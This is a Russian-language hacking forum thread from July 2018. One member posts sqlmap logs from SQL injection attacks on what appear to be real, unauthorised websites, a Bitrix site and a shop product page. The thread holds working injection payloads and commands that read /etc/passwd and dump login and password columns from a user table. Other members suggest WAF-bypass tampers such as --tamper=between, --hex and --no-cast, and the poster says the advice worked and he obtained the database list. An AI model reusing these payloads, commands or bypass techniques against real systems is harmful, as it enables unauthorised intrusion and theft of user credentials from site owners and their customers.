 |
|
13.07.2018, 02:18
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
разобрался с этим сайтом
Теперь вопрос про другой сайт. Нашел дыру (на битриксе).
Но не могу прочитать файлы, т.е. как обычно делаю --file-read='/etc/passwd', но выдает ошибку
Похожа ошибка была на другом сайте, она появлялась тогда, когда файл отсутствовал по указанному пути
.SpoilerTarget" type="button">Spoiler: Log
Код:
[17:30:10] [INFO] resuming back-end DBMS 'mysql'
[17:30:10] [INFO] testing connection to the target URL
[17:30:12] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SECTION_ID (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
---
[17:30:14] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[17:30:14] [INFO] fingerprinting the back-end DBMS operating system
[17:30:14] [INFO] the back-end DBMS operating system is Linux
[17:30:14] [INFO] fetching file: '/etc/passwd'
[17:30:14] [INFO] resumed:
[17:30:14] [WARNING] there was a problem decoding value ' ' from expected hexadecimal form
do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[17:30:21] [INFO] retrieved:
[17:30:21] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:[*] /root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)
[17:30:21] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
404 (Not Found) - 1 times ошибка выдается, скорее всего, по причине того, что при открытии страницы с sql-inject он отдает json но с HTTP CODE = 404
Теперь остается узнать какой параметр добавить, чтобы не было
Сообщение от None
[WARNING] there was a problem decoding value ' ' from expected hexadecimal form[*] /root/.sqlmap/output/site/files/_etc_passwd (size differs from remote file)
Ладно /etc/passwd может быть закрыт, но файлы битрикса хоть какие-то уже должен прочитать.
И в продолжении, в чем может быть причина, если это не отрабатывает
Код:
sqlmap -u site/inject.php?ID=1 -D database -T table_login -C LOGIN,PASSWORD --dump
И выдает ошибку
Сообщение от None
[WARNING] unable to retrieve the entries of columns 'LOGIN, PASSWORD' for table 'table_login' in database
А вот это отрабатывает
Сообщение от None
sqlmap -u site/inject.php?ID=1 --sql-query="select login from table_login where id=1"
.SpoilerTarget" type="button">Spoiler: Log2
Код:
[17:49:02] [INFO] resuming back-end DBMS 'mysql'
[17:49:02] [INFO] testing connection to the target URL
[17:49:04] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SECTION_ID (GET)
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: ID=1) OR (SELECT 9559 FROM(SELECT COUNT(*),CONCAT(0x7176717a71,(SELECT (ELT(9559=9559,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SAhe
---
[17:49:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0
[17:49:06] [INFO] fetching SQL SELECT statement query output: 'select login from table_login where id=1'
[17:49:08] [INFO] used SQL query returns 1 entries
[17:49:09] [INFO] retrieved: admin
select login from table_login where id=1: 'admin'
[17:49:09] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
Кодировка db - utf8 |
|
|
14.07.2018, 12:05
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
Найдена уязвимость
Код:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]
При попытке получить список баз данных вываливает ошибку
.SpoilerTarget" type="button">Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names
[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to ' http://site/index.php?route=product/...1&product_id=1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48
[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database
[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64
[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32
[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо |
|
|
|
17.07.2018, 11:15
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от mardoksp
↑
Найдена уязвимость
Код:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]
При попытке получить список баз данных вываливает ошибку
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names
[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to '
http://site/index.php?route=product/...1&product_id=1
AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48
[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database
[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64
[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32
[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо
1)нет прав
2)waf ответ 301 может или истекла сессия или поменялся ответ от сервера проверьте сайт не http может указывать нужно ,а https , после пробуйте --hex --no-cast ,тамперы и обход waf https://github.com/Ekultek/WhatWaf
3)поискать другую ошибку,где нет редиректа
|
|
|
|
17.07.2018, 21:01
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
пробую проверить, появляется ошибка
Не подскажите, как решить?
|
|
|
|
18.07.2018, 04:54
|
|
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689
Репутация:
1
|
|
Сообщение от mardoksp
↑
пробую проверить, появляется ошибка
Не подскажите, как решить?
Ты кажись насувал дахуя тамперов
кстати количество вроде не решит для каждой защиты свои тамперы (но это не точно)
|
|
|
|
18.07.2018, 14:49
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от mardoksp
↑
пробую проверить, появляется ошибка
Не подскажите, как решить?
вроде написано что слишком много редиректов.
|
|
|
|
18.07.2018, 16:39
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
Сообщение от Sensoft
↑
Ты кажись насувал дахуя тамперов
кстати количество вроде не решит для каждой защиты свои тамперы (но это не точно)
Сообщение от grimnir
↑
вроде написано что слишком много редиректов.
так я запустил по инструкции на гите, чтобы определило waf и указало какой тампер надо использовать.
И спустя стольких редиректов получаю ошибку. Я тампер в sqlmap вообще не использовал, думал WhatWaf подскажет что использовать
|
|
|
|
18.07.2018, 17:34
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от mardoksp
↑
Найдена уязвимость
Код:
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/product&path=1&product_id=1 AND 7670=7670
Vector: AND [INFERENCE]
При попытке получить список баз данных вываливает ошибку
Spoiler: Log
[03:50:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.33, Nginx
back-end DBMS: MySQL 5 (MariaDB fork)
[03:50:18] [INFO] fetching database names
[03:50:18] [INFO] fetching number of databases
[03:50:18] [DEBUG] resuming configuration option 'string' (3D)
[03:50:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[03:50:18] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51
sqlmap got a 301 redirect to '
http://site/index.php?route=product/...1&product_id=1
AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))'. Do you want to follow? [Y/n] n
[03:50:22] [WARNING] unexpected HTTP code '301' detected. Will use (extra) validation step in similar cases
[03:50:22] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48
[03:50:23] [PAYLOAD] 1 AND ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9
[03:50:25] [INFO] retrieved:
[03:50:25] [DEBUG] performed 3 queries in 7.29 seconds
[03:50:25] [ERROR] unable to retrieve the number of databases
[03:50:25] [INFO] falling back to current database
[03:50:25] [INFO] fetching current database
[03:50:25] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>64
[03:50:27] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>32
[03:50:28] [PAYLOAD] 1 AND ORD(MID((DATABASE()),1,1))>1
[03:50:30] [INFO] retrieved:
[03:50:30] [DEBUG] performed 3 queries in 4.97 seconds
[03:50:30] [CRITICAL] unable to retrieve the database names
Как дальше раскрутить? Спасибо
Код:
--tamper=greatest или --tamper=between или --tamper=least
Попробуйте один из этих. Судя по логам проблема в символе >, возможно так же и в [B]
|
|
|
|
18.07.2018, 18:36
|
|
Новичок
Регистрация: 08.04.2007
Сообщений: 7
Провел на форуме:
20649
Репутация:
0
|
|
[QUOTE="cat1vo"]
↑
Код:
--tamper=greatest или --tamper=between или --tamper=least
Попробуйте один из этих. Судя по логам проблема в символе
>
, возможно так же и в
, возможно так же и в
[B] обалдеть, сразу получил список баз |
|
|
|
18.07.2018, 18:50
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от mardoksp
↑
--tamper=between
помог, но как вы узнали по логам? как обучиться такому кунг-фу?
обалдеть, сразу получил список баз
Практика и труд
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
